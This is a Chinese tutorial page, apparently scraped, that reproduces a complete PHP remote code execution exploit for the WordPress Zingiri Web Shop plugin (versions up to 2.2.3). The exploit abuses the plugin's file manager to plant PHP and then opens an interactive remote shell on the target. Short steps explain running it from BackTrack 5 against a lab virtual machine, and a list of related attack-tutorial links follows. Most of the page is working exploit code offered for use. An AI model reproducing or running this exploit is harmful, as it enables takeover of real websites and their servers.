bt5制作php木马,BT5下利用WordpressZingiri Plugin渗透靶机镜像wordpress -电脑资料
Wordpress Zingiri Plugin的攻击代码如下:
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
$fileman = "wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager";
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die( "\n[-] No response from {$host}:80\n");
fwrite($sock, $packet);
return stream_get_contents($sock);
}
function get_root_dir()
{
global $host, $path, $fileman;
$packet = "GET {$path}{$fileman}/ajaxfilemanager.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (!preg_match('/currentFolderPath" value="([^"]*)"/', http_send($host, $packet), $m)) die("\n[-] Root folder path not found!\n");
return $m[1];
}
function random_mkdir()
{
global $host, $path, $fileman, $rootdir;
$dirname = uniqid();
$payload = "new_folder={$dirname}¤tFolderPath={$rootdir}";
$packet = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
return $dirname;
}
print "\n+----------------------------------------------------------------------------------+";
print "\n| Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit by EgiX |";
print "\n+----------------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] \n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /wordpress/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$rootdir = get_root_dir();
$phpcode = "";$payload = "selectedDoc[]={$phpcode}¤tFolderPath={$rootdir}";
$packet = "POST {$path}{$fileman}/ajax_file_cut.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
if (!preg_match("/Set-Cookie: ([^;]*);/", http_send($host, $packet), $sid)) die("\n[-] Session ID not found!\n");
$dirname = random_mkdir();
$newname = uniqid();
$payload = "value={$newname}&id={$rootdir}{$dirname}";
$packet = "POST {$path}{$fileman}/ajax_save_name.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}{$fileman}/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nzingiri-shell# ";if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
print $m[1] : die("\n[-] Exploit failed!\n");
}
?>
1、将代码保存为exp.php,存放在BT5中/etc下;
2、在BT5中输入:root@bt:/etc# php exp.php 192.168.0.133 /wordpress/ 如图:
3、通过PHP攻击代码得到目标主机的Shell
bt5制作php木马,BT5下利用WordpressZingiri Plugin渗透靶机镜像wordpress -电脑资料相关推荐
- bt5制作php木马,Bt5的sql注入实例
版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创! 恰饭广告 任务描述: 了解sql注入方法P170 任务环境说明: 攻击机:BT5 靶机:WEB服务器 攻击机安装服务/工具1 ...
- bt5制作php木马,BT5安全测试实践 - 安全牛课堂 - 领先的信息安全在线教育平台
{ "i18nChapterName": "章", "i18nUnitName": "节", "i18nLes ...
- system+执行mysql命令_Windows环境下通过MySQL以SYSTEM身份执行系统命令 -电脑资料
前段时间出了两个关于MySQL的漏洞<MySQL CREATE FUNCTION功能mysql.func表允许注入任意函数库漏洞>.<MySQL CREATE FUNCTION功能l ...
- Centos /Linux环境下利用Docker 安装mysql5.7镜像(含离线安装),启动mysql镜像并初始化数据库
Docker 安装mysql镜像,含离线 Docker 安装mysql镜像(含离线) 准备mysql的Docker镜像(需要在有网的服务器中下载) 将准备好tar导入到docker镜像 Docker启 ...
- 如何用手机HTML制作哆啦a梦,HTML5利用canvas绘制哆啦A梦头部-电脑自学网
html5的canvas是很强大的,下面本篇文章使用html5 canvas 实现一个简单的哆啦A梦头部.有一定的参考价值,有需要的朋友可以参考一下,希望对大家有所帮助. 效果如下: 代码如下: 您的 ...
- WIN10下配置swoolephp7.4的docker镜像流程及资料聚合
前言 在实际编程过程中,经常会遇到线上线下环境不一致,团队中各成员环境有差异的问题,而这些问题通常会占有大量的调试时间,所以如何将环境也像程序代码一样进行配置控制,保证各个环境下的程序运行预期一致.同 ...
- 查询电脑上mysql的密码忘记了怎么办_windows下mysql忘记root密码的解决方法 -电脑资料...
方法一: 1.在DOS窗口下输入net stop mysql5 或 net stop mysql 2.开一个DOS窗口,这个需要切换到mysql的bin目录, 一般在bin目录里面创建一个批处理1.b ...
- 利用docker搭建php7cms靶机
前言 今天应师父要求,写一篇利用docker搭建渗透靶机的文章来记录一下自己的菜鸟时光,要求是小白照着一步一步走就能搭建成功(即使我也是小白).想来想去还是从docker的安装说起吧. 一.docke ...
- winU盘装Linux win32,2016221在Windows系统下利用Win32 Disk Imager制作Ubuntu server U盘系统...
在Windows系统下利用Win32 Disk Imager制作Ubuntu server U盘系统 将Ubuntu server系统写入U盘制作成系统盘的软件有很多,为什我们选择使用 Win32 D ...
最新文章
- Transaction And Lock--锁相关基础
- 将Node.js升级到最新版本
- 【计算理论】计算理论总结 ( 上下文无关文法 CFG 转为下推自动机 PDA 示例 2 ) ★★
- hdu 3065 AC自动机
- 过来人经验!聊聊前端工程师的职业规划
- C#程序集相关的概念
- 在.NET中用excel导出(概要)
- Python-OpenCV快速教程
- Zend Studio 实用快捷键一览表
- python股票交易最大值最多可以完成k比交易_leetcode_贪心算法_python
- 移动互联网向2.0时代转变
- PAT乙级真题 1092 最好吃的月饼 C++实现
- B 站顶流何同学对话苹果 CEO 库克
- 软件测试技能大赛山东省,2018年全国职业院校技能大赛山东省选拔赛高职组软件测试赛项规程.pdf...
- 微信小程序云开发项目——多肉植物销售小程序
- 今日收获 18/4/2
- 抖音seo企业号开发在线客服关键系统上线.技术源代码mvc架构搭建
- 高中数学公式总结:解析几何(非常全)
- [Pytorch框架] 5.1 kaggle介绍
- 你知道GDT放电管结构及基本知识吗?